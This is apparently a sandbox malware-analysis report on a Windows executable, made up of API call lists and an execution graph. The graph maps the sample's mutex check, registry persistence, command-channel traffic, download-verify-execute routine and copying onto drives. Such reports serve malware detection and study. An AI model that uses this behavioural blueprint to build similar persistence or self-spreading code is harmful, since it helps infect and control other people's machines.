                                                                                                                                    • Opcode ID: 7ff1f6a6c7f609a02f2b7f0cb8a20d989c1467e854c2ae30cad7fe774086fae1
                                                                                                                                    • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                    • Opcode Fuzzy Hash: 7ff1f6a6c7f609a02f2b7f0cb8a20d989c1467e854c2ae30cad7fe774086fae1
                                                                                                                                    • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                    • Opcode ID: 717484efd16090e76a5f6f50ec8c25be0b30b0b06e4d972f140238cc77205b64
                                                                                                                                    • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                    • Opcode Fuzzy Hash: 717484efd16090e76a5f6f50ec8c25be0b30b0b06e4d972f140238cc77205b64
                                                                                                                                    • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                      • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                      • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                      • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                      • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                      • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                      • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                      • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                      • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                      • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                      • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                    • String ID: %S%S
                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                    • Opcode ID: f492fb3745eed00b8c6f39d02d898e4ad1aa2c93a055282723199110ccf6299a
                                                                                                                                    • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                    • Opcode Fuzzy Hash: f492fb3745eed00b8c6f39d02d898e4ad1aa2c93a055282723199110ccf6299a
                                                                                                                                    • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:0.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:1500
                                                                                                                                    Total number of Limit Nodes:1
execution_graph (condensed from the node/edge dump; addresses and API names are exactly as dumped, "N API calls" is the report's own summary label for a node, "/" separates alternative successors, and helper-only nodes without API labels are omitted)

Entry, mutex check and persistence (407940 -> 408317):
  407940 Sleep CreateMutexA GetLastError -> 407976 ExitProcess / 40797e (6 API calls)
  40797e -> 407a23 -> 40f1b0 GetLocaleInfoA strcmp -> 407a28 -> 407a30 ExitProcess / 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW
  407a38 -> 407a8c SetFileAttributesW RegOpenKeyExW -> 407ac8 wcslen RegSetValueExW -> 407afd RegCloseKey -> 40f400 memset memset CreateProcessW -> 40f471 ShellExecuteW / 40f462 Sleep -> 407b16 -> 407b29 RegCloseKey / 407b21 ExitProcess
  407b36 Sleep wsprintfW CopyFileW -> 407b7e SetFileAttributesW RegOpenKeyExW -> 407bba wcslen RegSetValueExW -> 407bef RegCloseKey -> 40f400 (6 API calls) -> 407c08 -> 407c1b RegCloseKey / 407c13 ExitProcess
  407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW -> 407c87 SetFileAttributesW RegOpenKeyExW -> 407cc3 wcslen RegSetValueExW -> 407cf8 RegCloseKey -> 40f400 (6 API calls) -> 407d11 -> 407d24 RegCloseKey / 407d1c ExitProcess
  407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW -> 407d9f RegSetValueExW RegCloseKey -> 407dcb RegOpenKeyExW -> 407df8 RegSetValueExW RegCloseKey -> 407e24 RegOpenKeyExW -> 407e51 RegSetValueExW RegCloseKey -> 407e7d RegOpenKeyExW -> 407eaa RegSetValueExW RegCloseKey -> 407ed6 RegOpenKeyExW -> 407f03 RegSetValueExW RegCloseKey -> 407f2f RegOpenKeyExW -> 407f5c RegSetValueExW RegCloseKey -> 407f88 RegOpenKeyExW -> 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey -> 40801f RegOpenKeyExW -> 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey -> 4080d9 RegOpenKeyExW -> 40810a (8 API calls) -> 4081f0 RegOpenKeyExW -> 408221 (8 API calls) -> 408307 Sleep -> 40d180 -> 40d150 -> 40cda0 (string helpers 40a740, 402420, 4024e0) -> 408317

Main routine (408322, 9 API calls) and its threads:
  408322 -> 405c00 InitializeCriticalSection CreateFileW; 4077f0; 4058c0; 406f70 Sleep GetModuleFileNameW
  405c00 -> 405c38 CreateFileMappingW -> 405c59 MapViewOfFile -> 405c78 GetFileSize -> 405c8d -> 40d1d0 / 405d30; teardown 405d07 UnmapViewOfFile -> 405d11 CloseHandle -> 405d1b CloseHandle -> 405d25 -> 40e0c0 CoInitializeEx
  40e0c0 -> 40e190 socket -> 40e1bd htons inet_addr setsockopt -> 40b430 (8 API calls) -> 40e236 bind lstrlenA sendto ioctlsocket -> 40e28b -> 40e310 -> 40e32c -> 40e348 recvfrom -> 40e369 Sleep / 40e376 StrCmpNIA -> 40e395 StrStrIA -> 40e3b6 StrChrA -> 40d320 -> 40d331 lstrlenA / 40d360 memcpy; 40e2b2 -> 40b4f0 shutdown closesocket
  40e0c0 -> 40e400 -> 40e640 memset InternetCrackUrlA InternetOpenA -> 40e6e1 InternetConnectA -> 40e71a HttpOpenRequestA -> 40e750 HttpSendRequestA -> 40e76d -> 40e78e InternetReadFile -> 40a990 (9 API calls) -> 40e7d6 memcpy; cleanup 40e830 / 40e83d / 40e84a InternetCloseHandle
  40e400 -> 40e530 -> 40d250 (405740 lstrlenA MultiByteToWideChar, 4056f0) -> 40e55a SysAllocString -> 40e571 CoCreateInstance -> 40e61d SysFreeString; result walk 40eea0 -> 40e9f0 (40ea93 lstrcmpiW, 40eaab SysFreeString) -> 40e870 -> 40ecc0 (40ed73 lstrcmpiW, 40edc3 lstrcmpiW, 40eddb / 40edf3 SysFreeString) -> 40ee20 (6 API calls) -> 40eae0 -> 40eb60 (40ec13 lstrcmpiW, 40ec63 lstrcmpiW, 40ec7b / 40ec93 SysFreeString) -> 40e990 -> 40e4b2 -> 40d470 -> 40d3e0 -> 40d390 _vscprintf wvsprintfA / 40d408 SysFreeString -> 40e4e1 SysFreeString -> 40e4eb -> 40e51e
  40e0c0 -> 40e12a -> 40b430 htons -> 40b3f0 inet_addr -> 40b409 gethostbyname / 40b41c socket -> 40b48c connect -> 40b4a0 getsockname -> 40b4d4 -> 40b4f0 shutdown closesocket -> 40b4dd -> 40eef0 -> 40b3d0 inet_ntoa -> 40d470 (11 API calls) -> 40ef70 memset InternetCrackUrlA InternetOpenA -> 40f014 InternetConnectA -> 40f04d HttpOpenRequestA -> 40f083 HttpAddRequestHeadersA HttpSendRequestA -> 40f0e4 InternetReadFile -> 40a990 (9 API calls) -> 40f12c memcpy; cleanup 40f17a / 40f187 / 40f194 InternetCloseHandle; 40e168 -> 40ac80
  4083d2 -> 407390 CoInitializeEx SysAllocString -> 4073e0 -> 407417 -> 407566 SysAllocString / 407670 CoCreateInstance -> 4075eb -> 4075f4 SysFreeString -> 4073bb SysFreeString -> 4073c8 CoUninitialize
  4083d7 CreateEventA -> 40c8b0 -> 40c870 (x4) -> 40c830 CryptAcquireContextW -> 40c84d CryptGenRandom CryptReleaseContext
  4083ef -> 40dbb0 -> 40a740 (7 API calls) -> 40dbc7 InitializeCriticalSection -> 4083f9 -> 40bc70 InitializeCriticalSection -> 40bc8a -> 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980; 40b850; 40bcb9 CreateFileW -> 40bce0 CreateFileMappingW -> 40bd01 MapViewOfFile -> 40bd1c GetFileSize -> 40bd3b -> 40b850 (32 API calls) / 40df20; teardown 40bd84 UnmapViewOfFile -> 40bd8e CloseHandle -> 40bd98 CloseHandle -> 40bda2 -> 40b510 EnterCriticalSection -> 40b530 (14 API calls) -> 40b523 LeaveCriticalSection
  40b850 -> 40b780 gethostname -> 40b7a7 gethostbyname -> 40b7c3 -> 40b3d0 inet_ntoa -> 40b87c strcmp -> 40b891 -> inet_ntoa -> 40b89f strstr -> (each via 40b3d0 inet_ntoa) 40b8bd strstr -> 40b8db strstr -> 40b8fe strstr -> 40b91c strstr -> 40b93a strstr -> 40b95d strstr -> 40b97b strstr -> 40b999 strstr -> 40b9ae EnterCriticalSection -> 40b9c6 -> 40df20 -> 40b9f1 -> 40a740 (7 API calls) -> 40ba35 -> 40df20 -> 40ba53 -> 40ba76 Sleep / 40ba80 -> 40baa5 -> 40b530 -> 40b5b4 CreateFileW -> 40b5d7 WriteFile FlushFileBuffers CloseHandle -> 40b603 InterlockedExchange -> 40baea LeaveCriticalSection
  408403 / 408438 / 408453 / 40846f -> 40dbe0 (17 API calls) -> 40dbf7 EnterCriticalSection -> 40dcd0 -> 40dd01 WaitForSingleObject -> 40dd1c CloseHandle -> 40dc13 -> 40a990 (9 API calls) -> 40dc39 -> 40dc4b CreateThread -> 40dc6e -> 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle -> 40dcbb LeaveCriticalSection
  40846f -> 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority -> 40dd86 InterlockedExchangeAdd -> 40dda0 -> 40ddb9 EnterCriticalSection / 40de03 WaitForSingleObject / 40de27 LeaveCriticalSection / 40de5c Sleep -> 40de69 GetCurrentThread SetThreadPriority -> 408480 -> 40de90 -> 40de9c EnterCriticalSection -> 40decb CloseHandle -> 40dee0 LeaveCriticalSection DeleteCriticalSection -> 40df12 -> 40848e

Download, verify and execute (405d30 -> 4076c0 -> 40f560):
  405d30 -> 40a990 -> 405d6a memcpy -> 40abd0 -> 40cb40 -> 405ded -> 4076c0 -> 40a950 -> 4076dc memcpy CreateThread CloseHandle -> 407720 GetTickCount srand rand Sleep -> 407757 -> 407766 StrChrA / 40f560 (9 API calls); 4077ad -> 40f560 (63 API calls); 4077ab -> 40ab60 -> 4077d8
  40f560 -> 40f623 InternetOpenUrlW -> 40f652 CreateFileW -> 40f681 InternetReadFile -> 40f6a5 -> 40f6ae WriteFile (loop) -> 40f6d4 CloseHandle wsprintfW DeleteFileW Sleep -> 40f240 CreateFileW -> 40f285 CreateFileMappingW -> 40f2a6 MapViewOfFile -> 40f2c5 GetFileSize -> 40f2e1 -> 40d1a0 -> 40cbd0 (10 API calls) -> 40cb40 (7 API calls) -> 40f330 -> 40f34d memcmp -> 40f369 -> 40f37c UnmapViewOfFile -> 40f386 CloseHandle -> 40f390 CloseHandle -> 40f39a -> 40f3a0 CreateFileW -> 40f3c2 WriteFile CloseHandle -> 40f3e8 -> 40f3f1 -> 40f767 DeleteFileW / 40f72b Sleep -> 40f400 (6 API calls: CreateProcessW, ShellExecuteW) -> 40f742 -> 40f75e / 40f756 ExitProcess; 40f774 CloseHandle -> 40f781 InternetCloseHandle
  40f560 -> 40f78e InternetCloseHandle Sleep -> 40f7b5 (6 API calls) -> 40f831 wsprintfW DeleteFileW Sleep -> 40f240 (21 API calls) -> 40f871 -> 40f87b Sleep -> 40f400 (6 API calls) -> 40f892 -> 40f8a5 ExitProcess / 40f8af DeleteFileW -> 407795 Sleep
  4077f0 -> 407840 -> 407868 Sleep / 40791a Sleep / 407897 Sleep wsprintfA DeleteUrlCacheEntry -> 40f4b0 InternetOpenA -> 40f4d6 InternetOpenUrlA -> 40f4f5 HttpQueryInfoA -> 40f51e -> 40f534 InternetCloseHandle -> 40f53e InternetCloseHandle -> 40f548 Sleep; 407840 -> 40f560 (63 API calls)

Hidden window thread (4058c0):
  4058c9 memset GetModuleHandleW -> 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW (self-loop) -> 405940 CreateWindowExW -> 40596d GetMessageA -> 405981 TranslateMessage DispatchMessageA (loop) / 405997 -> 40599f ExitThread

Drive enumeration and file drop thread (406f70):
  406f70 Sleep GetModuleFileNameW -> 40f1f0 CreateFileW -> 40f21f GetFileSize CloseHandle -> 40f238 -> 406fa0 -> 4070e8 Sleep (loop) / 4063e0 GetLogicalDrives -> 40640d -> 40641c RegOpenKeyExW -> 40643e RegQueryValueExW -> 40647a RegCloseKey / 406fd9 -> 406300 -> 40631c -> 406360 GetDriveTypeW -> 40634b lstrcpyW -> 406359 -> 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW -> 407086 wsprintfW / 40709b wsprintfW -> 4068e0 _chkstk; 4070f8 ExitThread
  4068e0 -> 4068fe (7 API calls) -> 4069d2 -> 40f1f0 (3 API calls) -> 4069de -> 4069f5 SetFileAttributesW DeleteFileW -> 406a14 PathFileExistsW -> 406a29 PathFileExistsW -> 406a3a SetFileAttributesW DeleteFileW -> 406a59 PathFileExistsW -> 406a6a CreateDirectoryW -> 406a7d SetFileAttributesW -> 406a8c PathFileExistsW -> 406a9d CopyFileW -> 406ab5 SetFileAttributesW -> 406ac4 -> 4064a0 (7 API calls) / 406ad4 -> 40f1f0 (3 API calls) -> 406af5 PathFileExistsW -> 406b06 -> 40f1f0 (3 API calls) -> 406b12 -> 406b28 SetFileAttributesW DeleteFileW -> 406b47 PathFileExistsW -> 406b58 -> 406b64 PathFileExistsW -> 406b73 CopyFileW -> 406b8b SetFileAttributesW PathFileExistsW -> 406bca PathFileExistsW -> 406bdf PathFileExistsW -> 406bf0 / 406c2c -> 406c34 / 406c4e; 406bca -> 406c75 FindFirstFileW -> 406c9c / 4068f7 -> 40700b

Heap, string and buffer helpers (called throughout):
  40a740 / 40a760 -> 40a800 GetCurrentProcessId -> 40a777 _invalid_parameter -> 40a820 -> 40a846 HeapCreate -> 40a860 HeapSetInformation GetCurrentProcessId; 40a890 GetProcessHeaps; 40a792 HeapAlloc -> 40a7d4 memset
  40a990 -> 40a800 GetCurrentProcessId -> 40aa1a HeapReAlloc / 40aa50 HeapAlloc / 40aaa0 _invalid_parameter HeapValidate
  40ab60 -> 40a800 GetCurrentProcessId -> 40aaa0 -> 40aad0 HeapValidate -> 40ab87 HeapFree
  402420 / 402820 -> 40a950 (7 API calls); 4024e0 -> 402540 __aligned_recalloc_base -> 4025e2 memcpy; 402850 -> 40ab60; 403ca0, 403d70, 403df0, 403e20, 404090, 404680 (alloc/free chains over 402820 and 402850)
  40abd0 -> 40ac14 memcpy -> 40c6e0 -> 40c721 memcmp / 40cbd0 / 4084a0 -> 40a6c0 -> 40a620 -> 409b50 (409ba6 memset, 409bcd memcpy) / 40a140 (40a24f memcpy) / 40a510 (40a5db memcpy) -> 409920 -> 409860 (6 API calls); 409e70 -> 409cb0 -> 409610 -> 4094e0 (9 API calls) -> 409350 (46 API calls); 409dfc memset; 409fc8 / 409fe7 memcpy
  40cbd0 -> 40cc78 -> 402420 -> 40cd40 -> 4024e0 (10 API calls) -> 4026f0 -> 402710 -> 402540 (x4); 402470 -> 40ab60

(the listing is cut off in the source after node 5456 406660 "4 API")
calls 5449->5456 5457 406660 4 API calls 5450->5457 5451->5434 5458 406bab SetFileAttributesW DeleteFileW 5451->5458 5461 406660 4 API calls 5452->5461 5489 406660 CoInitialize CoCreateInstance 5453->5489 5454 406d5e lstrcmpW 5460 406d74 lstrcmpW 5454->5460 5454->5471 5455->5422 5462 406c0d SetFileAttributesW 5456->5462 5457->5462 5458->5434 5460->5471 5461->5462 5462->5440 5463 406f35 FindNextFileW 5463->5454 5465 406f51 FindClose 5463->5465 5465->5447 5466 406dba lstrcmpiW 5466->5471 5467 406e21 PathMatchSpecW 5468 406e42 wsprintfW SetFileAttributesW DeleteFileW 5467->5468 5467->5471 5468->5471 5469 406e9f PathFileExistsW 5470 406eb5 wsprintfW wsprintfW 5469->5470 5469->5471 5470->5471 5472 406f1f MoveFileExW 5470->5472 5471->5454 5471->5463 5471->5466 5471->5467 5471->5469 5494 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5471->5494 5472->5463 5475 406388 5474->5475 5478 40633f 5474->5478 5476 40639c QueryDosDeviceW 5475->5476 5475->5478 5477 4063b6 StrCmpNW 5476->5477 5476->5478 5477->5478 5478->5410 5478->5414 5480 406640 InternetCloseHandle 5479->5480 5481 40653e InternetOpenUrlW 5479->5481 5480->5442 5482 406633 InternetCloseHandle 5481->5482 5483 40656b CreateFileW 5481->5483 5482->5480 5484 406626 CloseHandle 5483->5484 5485 406598 InternetReadFile 5483->5485 5484->5482 5486 4065eb CloseHandle wsprintfW DeleteFileW 5485->5486 5487 4065bc 5485->5487 5486->5484 5487->5486 5488 4065c5 WriteFile 5487->5488 5488->5485 5490 406696 5489->5490 5493 4066ee 5489->5493 5491 4066a9 wsprintfW 5490->5491 5492 4066cf wsprintfW 5490->5492 5490->5493 5491->5493 5492->5493 5493->5462 5495 4067f5 lstrcmpW 5494->5495 5496 4068cf 5494->5496 5497 40680b lstrcmpW 5495->5497 5501 406821 5495->5501 5496->5471 5498 406823 wsprintfW wsprintfW 5497->5498 5497->5501 5500 406886 MoveFileExW 5498->5500 5498->5501 5499 40689c FindNextFileW 5499->5495 5502 4068b8 FindClose RemoveDirectoryW 5499->5502 5500->5499 5501->5499 5502->5496 5870 40d980 5876 4021b0 5870->5876 5873 40d9bf 5874 
40d9a5 WaitForSingleObject 5880 401600 5874->5880 5877 4021bb 5876->5877 5878 4021cf 5876->5878 5877->5878 5901 402020 5877->5901 5878->5873 5878->5874 5881 401737 5880->5881 5882 40160d 5880->5882 5881->5873 5882->5881 5883 401619 EnterCriticalSection 5882->5883 5884 401630 5883->5884 5885 4016b5 LeaveCriticalSection SetEvent 5883->5885 5884->5885 5890 401641 InterlockedDecrement 5884->5890 5892 40165a InterlockedExchangeAdd 5884->5892 5899 4016a0 InterlockedDecrement 5884->5899 5886 4016d0 5885->5886 5887 4016e8 5885->5887 5888 4016d6 PostQueuedCompletionStatus 5886->5888 5889 40dd50 11 API calls 5887->5889 5888->5887 5888->5888 5891 4016f3 5889->5891 5890->5884 5893 40de90 7 API calls 5891->5893 5892->5884 5894 40166d InterlockedIncrement 5892->5894 5895 4016fc CloseHandle CloseHandle WSACloseEvent 5893->5895 5896 401c50 4 API calls 5894->5896 5922 40b4f0 shutdown closesocket 5895->5922 5896->5884 5898 401724 DeleteCriticalSection 5900 40ab60 _invalid_parameter 3 API calls 5898->5900 5899->5884 5900->5881 5902 40a740 7 API calls 5901->5902 5903 40202b 5902->5903 5904 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5903->5904 5910 4021a5 5903->5910 5905 402076 CreateIoCompletionPort 5904->5905 5906 40219f 5904->5906 5905->5906 5907 40208f 5905->5907 5908 401600 36 API calls 5906->5908 5909 40dbb0 8 API calls 5907->5909 5908->5910 5911 402094 5909->5911 5910->5878 5911->5906 5912 40209f WSASocketA 5911->5912 5912->5906 5913 4020bd setsockopt htons bind 5912->5913 5913->5906 5914 402126 listen 5913->5914 5914->5906 5915 40213a WSACreateEvent 5914->5915 5915->5906 5916 402147 WSAEventSelect 5915->5916 5916->5906 5917 402159 5916->5917 5918 40217f 5917->5918 5919 40dbe0 17 API calls 5917->5919 5920 40dbe0 17 API calls 5918->5920 5919->5917 5921 402194 5920->5921 5921->5878 5922->5898 5935 406085 5937 405ffe 5935->5937 5936 40608a LeaveCriticalSection 5937->5936 5938 40abd0 8 API calls 5937->5938 5939 40605c 5938->5939 5939->5936 5503 406fc6 5507 406fa8 
5503->5507 5504 4070e8 Sleep 5504->5507 5505 406fd9 5506 406300 4 API calls 5505->5506 5509 406fea 5506->5509 5507->5504 5507->5505 5508 4070f8 ExitThread 5507->5508 5510 4063e0 4 API calls 5507->5510 5511 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5509->5511 5515 40700b 5509->5515 5510->5507 5512 407086 wsprintfW 5511->5512 5513 40709b wsprintfW 5511->5513 5512->5513 5514 4068e0 82 API calls 5513->5514 5514->5515 5940 40f908 5941 40f910 5940->5941 5942 40f9c4 5941->5942 5946 40fb45 5941->5946 5945 40f949 5945->5942 5950 40fa30 RtlUnwind 5945->5950 5947 40fb5a 5946->5947 5949 40fb76 5946->5949 5948 40fbe5 NtQueryVirtualMemory 5947->5948 5947->5949 5948->5949 5949->5945 5951 40fa48 5950->5951 5951->5945 5516 40df50 5519 40bf20 5516->5519 5532 40bf31 5519->5532 5522 40ab60 _invalid_parameter 3 API calls 5523 40c2ff 5522->5523 5524 40c310 21 API calls 5524->5532 5526 40bf4f 5526->5522 5528 40bed0 13 API calls 5528->5532 5529 40b830 32 API calls 5529->5532 5532->5524 5532->5526 5532->5528 5532->5529 5533 40c460 5532->5533 5540 40bc00 EnterCriticalSection 5532->5540 5545 407240 5532->5545 5550 4072e0 5532->5550 5555 407110 5532->5555 5562 407210 5532->5562 5534 40c471 lstrlenA 5533->5534 5535 40cb40 7 API calls 5534->5535 5536 40c48f 5535->5536 5536->5534 5538 40c49b 5536->5538 5537 40ab60 _invalid_parameter 3 API calls 5539 40c51f 5537->5539 5538->5537 5538->5539 5539->5532 5542 40bc18 5540->5542 5541 40bc54 LeaveCriticalSection 5541->5532 5542->5541 5565 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5542->5565 5544 40bc43 5544->5541 5566 407280 5545->5566 5548 407279 5548->5532 5549 40dbe0 17 API calls 5549->5548 5551 407280 75 API calls 5550->5551 5552 4072ff 5551->5552 5553 40732c 5552->5553 5581 407340 5552->5581 5553->5532 5592 405fe0 EnterCriticalSection 5555->5592 5557 40712a 5558 40715d 5557->5558 5597 407170 5557->5597 5558->5532 5561 40ab60 _invalid_parameter 3 API calls 5561->5558 5604 4060a0 EnterCriticalSection 5562->5604 5564 
407232 5564->5532 5565->5544 5569 407293 5566->5569 5567 407254 5567->5548 5567->5549 5569->5567 5570 405ef0 EnterCriticalSection 5569->5570 5571 40d1d0 71 API calls 5570->5571 5572 405f0e 5571->5572 5573 405fcb LeaveCriticalSection 5572->5573 5574 405f27 5572->5574 5579 405f48 5572->5579 5573->5569 5575 405f31 memcpy 5574->5575 5576 405f46 5574->5576 5575->5576 5577 40ab60 _invalid_parameter 3 API calls 5576->5577 5578 405fc8 5577->5578 5578->5573 5579->5576 5580 405fa6 memcpy 5579->5580 5580->5576 5584 40be30 5581->5584 5585 40c8b0 3 API calls 5584->5585 5586 40be3b 5585->5586 5587 40be57 lstrlenA 5586->5587 5588 40cb40 7 API calls 5587->5588 5589 40be8d 5588->5589 5590 407385 5589->5590 5591 40ab60 _invalid_parameter 3 API calls 5589->5591 5590->5553 5591->5590 5593 405ffe 5592->5593 5594 40608a LeaveCriticalSection 5593->5594 5595 40abd0 8 API calls 5593->5595 5594->5557 5596 40605c 5595->5596 5596->5594 5598 40a950 _invalid_parameter 7 API calls 5597->5598 5599 407182 memcpy 5598->5599 5600 40be30 13 API calls 5599->5600 5601 4071ec 5600->5601 5602 40ab60 _invalid_parameter 3 API calls 5601->5602 5603 407151 5602->5603 5603->5561 5629 40d230 5604->5629 5607 4062e3 LeaveCriticalSection 5607->5564 5608 40d1d0 71 API calls 5609 4060d9 5608->5609 5609->5607 5610 406134 memcpy 5609->5610 5612 4061f8 5609->5612 5613 40ab60 _invalid_parameter 3 API calls 5610->5613 5611 406221 5614 40ab60 _invalid_parameter 3 API calls 5611->5614 5612->5611 5615 405d30 76 API calls 5612->5615 5616 406158 5613->5616 5617 406242 5614->5617 5615->5611 5618 40abd0 8 API calls 5616->5618 5617->5607 5619 406251 CreateFileW 5617->5619 5620 406168 5618->5620 5619->5607 5621 406274 5619->5621 5622 40ab60 _invalid_parameter 3 API calls 5620->5622 5624 406291 WriteFile 5621->5624 5625 4062cf FlushFileBuffers CloseHandle 5621->5625 5623 40618f 5622->5623 5626 40cb40 7 API calls 5623->5626 5624->5621 5625->5607 5627 4061c5 5626->5627 5628 4076c0 72 API calls 5627->5628 5628->5612 5632 40c780 
5629->5632 5634 40c791 5632->5634 5633 40abd0 8 API calls 5633->5634 5634->5633 5635 40c6e0 70 API calls 5634->5635 5637 40c7ab 5634->5637 5639 4084a0 68 API calls 5634->5639 5640 40c7eb memcmp 5634->5640 5635->5634 5636 40ab60 _invalid_parameter 3 API calls 5638 4060c2 5636->5638 5637->5636 5638->5607 5638->5608 5639->5634 5640->5634 5640->5637 5641 401f50 GetQueuedCompletionStatus 5642 401f92 5641->5642 5647 402008 5641->5647 5643 401f97 WSAGetOverlappedResult 5642->5643 5648 401d60 5642->5648 5643->5642 5644 401fb9 WSAGetLastError 5643->5644 5644->5642 5646 401fd3 GetQueuedCompletionStatus 5646->5642 5646->5647 5649 401ef2 InterlockedDecrement setsockopt closesocket 5648->5649 5650 401d74 5648->5650 5651 401e39 5649->5651 5650->5649 5652 401d7c 5650->5652 5651->5646 5668 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5652->5668 5654 401d81 InterlockedExchange 5655 401d98 5654->5655 5656 401e4e 5654->5656 5655->5651 5659 401da9 InterlockedDecrement 5655->5659 5660 401dbc InterlockedDecrement InterlockedExchangeAdd 5655->5660 5657 401e67 5656->5657 5658 401e57 InterlockedDecrement 5656->5658 5661 401e72 5657->5661 5662 401e87 InterlockedDecrement 5657->5662 5658->5646 5659->5646 5664 401e2f 5660->5664 5677 401ae0 WSASend 5661->5677 5663 401ee9 5662->5663 5663->5646 5669 401cf0 5664->5669 5666 401e7e 5666->5646 5668->5654 5670 401d00 InterlockedExchangeAdd 5669->5670 5671 401cfc 5669->5671 5672 401d53 5670->5672 5673 401d17 InterlockedIncrement 5670->5673 5671->5651 5672->5651 5683 401c50 WSARecv 5673->5683 5675 401d46 5675->5672 5676 401d4c InterlockedDecrement 5675->5676 5676->5672 5678 401b50 5677->5678 5679 401b12 WSAGetLastError 5677->5679 5678->5666 5679->5678 5680 401b1f 5679->5680 5681 401b56 5680->5681 5682 401b26 Sleep WSASend 5680->5682 5681->5666 5682->5678 5682->5679 5684 401cd2 5683->5684 5685 401c8e 5683->5685 5684->5675 5686 401c90 WSAGetLastError 5685->5686 5687 401ca4 Sleep WSARecv 5685->5687 5688 401cdb 5685->5688 5686->5684 5686->5685 
